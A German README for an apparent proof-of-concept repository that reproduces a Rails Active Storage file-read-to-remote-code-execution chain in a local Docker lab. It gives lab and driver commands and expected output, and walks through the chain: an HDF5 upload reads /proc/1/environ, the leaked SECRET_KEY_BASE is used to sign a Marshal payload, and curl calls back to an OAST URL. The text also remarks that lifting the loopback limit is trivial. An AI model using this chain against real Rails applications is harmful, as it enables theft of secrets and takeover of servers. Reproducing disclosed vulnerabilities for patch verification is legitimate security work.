
PoC für CVE-2026-66066 in Ruby on Rails
Dieses Repository reproduziert die Rails-Active-Storage-Datei-Lesen-zu-RCE-Kette, die in GHSA-xr9x-r78c-5hrm beschrieben wird, gegen Rails 8.1.3, das neueste betroffene Rails-8.1-Release. Rails 8.1.3.1 ist die gepatchte Kontrolle.
Verwenden Sie es nur in dem hier beschriebenen wegwerfbaren lokalen Labor. Der HTTP-Treiber verweigert Nicht-Loopback-Ziele (obwohl es trivial ist, den Python-Code für autorisierte Tests gegen andere Ziele zu ändern).
Das Ziel ist eine konventionelle Rails-Anwendung. Ihr finales Image enthält:
ruby:3.4.10-slim Docker Official Image;rails _VERSION_ new erzeugt wurde;curl, libjemalloc2, libvips
und sqlite3;./bin/thrust ./bin/rails server; undUpload-Modell mit einem einzelnen Active-Storage-Anhang, gewöhnliche
HTML-new-, create- und show-Aktionen sowie eine PNG-Bildvariante.Es enthält keinen Artefakt-Builder, kein Upload-Artefakt, keinen Exploit-Treiber,
keinen Marshal-Konstruktor, keinen Callback-Code, keinen Diagnose-Endpunkt, kein Loader-Tracing,
kein benutzerdefiniertes Boot-Skript, keine Ziel-Geheimnis-Fixtur und keine Nur-Exploit-Route. Es setzt
VIPS_TRACE nicht, ordnet die Prozessumgebung nicht neu, überschreibt den Active-Storage-Serializer
nicht und konfiguriert keinen nicht standardmäßigen Bildprozessor.
Das root .dockerignore sendet nur Dockerfile und overlay/ an den Build.
Die hostseitigen Python-Skripte und alle erzeugten Artefakte sind vom
Docker-Build-Kontext ausgeschlossen, nicht nur vom finalen Kopierschritt weggelassen.
Das vollständige Ziel-Overlay besteht aus fünf gewöhnlichen Dateien:
app/controllers/uploads_controller.rb
app/models/upload.rb
app/views/uploads/new.html.erb
app/views/uploads/show.html.erb
config/routes.rb
Die Show-Seite verwendet die minimale normale Transformation:
<%= image_tag @upload.avatar.variant(format: :png) %>
Eine unberührte neue Rails-Anwendung hat kein Anwendungsmodell und keine Seite, die einen Anhang akzeptiert, daher sind diese fünf Dateien die minimale Anwendungsfunktionalität, die benötigt wird, um die Bedingung des nicht vertrauenswürdigen Bild-Uploads aus dem Advisory darzustellen.
Voraussetzungen sind Docker, OpenSSL, Python 3 und h5py für den
Artefakt-Builder.
In Terminal 1:
./run_lab.sh 8.1.3
Das Skript baut minimal-rails-vips:8.1.3, erzeugt eine ephemere
SECRET_KEY_BASE, sofern nicht bereits eine bereitgestellt wird, veröffentlicht die Anwendung
nur unter 127.0.0.1:3000 und führt den erzeugten Entrypoint und den
Standardbefehl des Images aus. Kein Quellverzeichnis oder Artefakt wird in das Ziel eingebunden.
Wenn Port 3000 bereits belegt ist, wählen Sie einen anderen Loopback-Port, ohne das Image zu ändern:
HOST_PORT=33020 ./run_lab.sh 8.1.3
Verwenden Sie denselben Port im --target des Treibers.
In Terminal 2:
python3 -m venv .venv
. .venv/bin/activate
python3 -m pip install h5py
python3 rails_vips_oast_poc.py \
--target http://127.0.0.1:3000 \
--oast https://YOUR-OAST-DOMAIN.example/callback
rails_vips_oast_poc.py ist ein Einmal-Builder und HTTP-Treiber. Sofern
--artifact nicht angegeben ist, konstruiert es den Upload in einem privaten temporären
Verzeichnis, behält ihn für die vollständige Anfragesequenz und entfernt ihn, wenn
der Prozess beendet wird. Es konstruiert beide Stufen, anstatt eine statische
Nutzlast zu entpacken:
h5py, eine MATLAB/HDF5-Datei mit einem 512-Byte-Benutzerblock zu erstellen.1 × 1024-Little-Endian-uint8-Dataset namens environment./proc/1/environ unterstützt wird, mit Offset
null und einer begrenzten Ausdehnung von 1.024 Byte.MATLAB_class="uint8" hinzu und schreibt den MATLAB 5.0-Header, der von
libvips' matload-Sniffer verwendet wird.Das eingebettete RCE-Programm ist auf /usr/bin/curl mit einem strukturierten
Argument-Array festgelegt. Es führt einen GET zur konfigurierten OAST-URL aus und sendet nur
das zufällige rails_ghsa_xr9x-Korrelationstoken. Es verwendet keine Shell und
enthält keine wiederhergestellten Geheimnisse, Befehlsausgaben, Dateiinhalte oder eine
Zielkennung im Callback.
Artefakt-Parameter sind:
--external-path: absolute Datei auf Zielseite, Standard /proc/1/environ;--bytes: begrenzte externe Ausdehnung von 128 bis 4096, Standard 1024;--oast: in der Nutzlast eingebettete Callback-Basis-URL; und--nonce: optionale 16-Byte-Hexadezimal-Nonce für ein reproduzierbares Artefakt.Die Standard-OAST-URL ist loopback-sicher. Geben Sie eine Empfänger-URL an, die vom Container aus erreichbar ist, für den End-to-End-Check.
Um den erzeugten Upload zur Inspektion oder Wiederverwendung aufzubewahren, fügen Sie einen Artefaktpfad hinzu:
python3 rails_vips_oast_poc.py \
--target http://127.0.0.1:3000 \
--oast https://YOUR-OAST-DOMAIN.example/callback \
--artifact environment-read.bmp
Ein vorhandenes --artifact wird validiert und wiederverwendet. In diesem Fall muss --oast, wenn
angegeben, mit seiner eingebetteten Callback-URL übereinstimmen. Fügen Sie --force hinzu, um es mit den aktuellen Builder-Parametern neu zu konstruieren und
atomar zu ersetzen.
Für die Artefakterstellung ohne HTTP-Anfragen ist der Begleit-Builder weiterhin verfügbar:
python3 build_upload_artifact.py \
--output environment-read.bmp \
--oast https://YOUR-OAST-DOMAIN.example/callback
--target ist standardmäßig http://127.0.0.1:3000 und auf wörtliches
Loopback oder localhost beschränkt.
Die erwartete verwundbare Ausgabe umfasst:
artifact_mode=constructed
artifact_retained=false
embedded_payload=true
safe_png_representation_http=200
direct_blob_create_http=200
direct_object_put_http=204
environment_representation_http=200
returned_geometry=1x1024x1
ARBITRARY_ENV_READ_RESULT=CONFIRMED
marshal_source=embedded_artifact
rce_program=/usr/bin/curl
oast_probe_http=500
OAST_RESULT=CHECK_RECEIVER
Gleichen Sie oast_nonce im Terminal mit dem
rails_ghsa_xr9x=<nonce>-Abfrageparameter ab, der vom OAST-Dienst empfangen wird. Der
HTTP 500 von der finalen Darstellungsanfrage ist erwartet: Der Callback
erfolgt, während der authentifizierte Marshal-Hash neu aufgebaut wird, bevor die
Gesamttransformation anschließend fehlschlägt.
Der Builder-Teil erfordert h5py; die HTTP- und kryptografischen Teile verwenden nur
Pythons Standardbibliothek:
image/bmp deklariert ist, und lädt dann die konstruierten
Bytes hoch.matload-Operation. Das zurückgegebene
PNG legt die externen Dataset-Bytes offen, einschließlich der Laufzeit-
SECRET_KEY_BASE.ActiveStorage-Verifier-Schlüssel ab, liest die
bereits konstruierte Marshal-Nutzlast aus dem Artefakt, signiert sie für den
variation-Zweck und fordert die resultierende Darstellungs-URL an./usr/bin/curl-Nutzlast auf und erzeugt
den blinden OOB-Callback.Das Ziel trägt keinen Hilfs-Endpunkt oder Signierungs-Gadget bei. Die Ruby-Klassen,
die vom serialisierten Graphen verwendet werden, stammen aus Abhängigkeiten, die bereits von einem
Stock-rails new-Gemfile aufgelöst wurden; die Anwendung erfordert oder konfiguriert sie nicht.
Die Bildverarbeitung bleibt während des gesamten Prozesses auf dem Rails-Standardprozessor :vips.
Stoppen Sie Terminal 1 mit Strg-C und führen Sie dann aus:
./run_lab.sh 8.1.3.1
Führen Sie denselben kombinierten Treiberbefehl erneut aus. Wenn ein Artefakt aufbewahrt wurde, kann es
durch Übergabe desselben --artifact-Pfads wiederverwendet werden. Das gepatchte Ergebnis sollte
bei Folgendem stoppen:
safe_png_representation_http=200
direct_blob_create_http=200
direct_object_put_http=204
environment_representation_http=500
Es werden keine Umgebungs-Pixel zurückgegeben, die eingebettete Nutzlast wird nie signiert oder
übermittelt, und es erfolgt kein OAST-Callback. Active Storage 8.1.3.1 aktiviert
libvips' Block für nicht vertrauenswürdige Operationen, daher wird matload abgelehnt.
Die finale Laufzeitkonfiguration sollte die erzeugte sein:
docker image inspect minimal-rails-vips:8.1.3 \
--format 'entrypoint={{json .Config.Entrypoint}} cmd={{json .Config.Cmd}} user={{json .Config.User}}'
Erwartet:
entrypoint=["/rails/bin/docker-entrypoint"] cmd=["./bin/thrust","./bin/rails","server"] user="1000:1000"
Überprüfen Sie das einzige Skript und bestätigen Sie, dass die PoC-Dateien fehlen:
docker run --rm --entrypoint sh minimal-rails-vips:8.1.3 -lc '
find /rails/script -maxdepth 2 -type f -print
test ! -e /rails/payloads
test ! -e /rails/payload_builder.c
test ! -e /rails/config/master.key
'
Der einzige Skripteintrag ist das vom Generator erstellte /rails/script/.keep.
Build-Tools und optionale Image-CLIs bleiben ebenfalls außerhalb der Laufzeit:
docker run --rm --entrypoint sh minimal-rails-vips:8.1.3 -lc '
for tool in gcc h5cc vips vipsheader convert magick tesseract; do
command -v "$tool" >/dev/null 2>&1 && echo "unexpected: $tool"
done
'
libvips ist als gemeinsame Laufzeitbibliothek vorhanden, obwohl seine CLI-Tools
nicht installiert sind. Debian's Stock-Abhängigkeitsgraph liefert die verknüpfte MAT/HDF5-
Formatunterstützung.
Dockerfile erzeugt und verpackt das minimale Stock-Ziel..dockerignore verhindert, dass angreiferseitige Dateien in den Build-
Kontext gelangen.overlay/ enthält nur die fünf normalen Rails-Anwendungsdateien.run_lab.sh baut und startet das Ziel, ohne den PoC auszuführen.rails_vips_oast_poc.py konstruiert das HDF5-Datei-Lese-Bild und die konfigurierbare
OOB-Nutzlast, treibt den normalen HTTP-Fluss, stellt das Verifier-Geheimnis wieder her,
signiert die eingebettete Nutzlast und löst sie aus.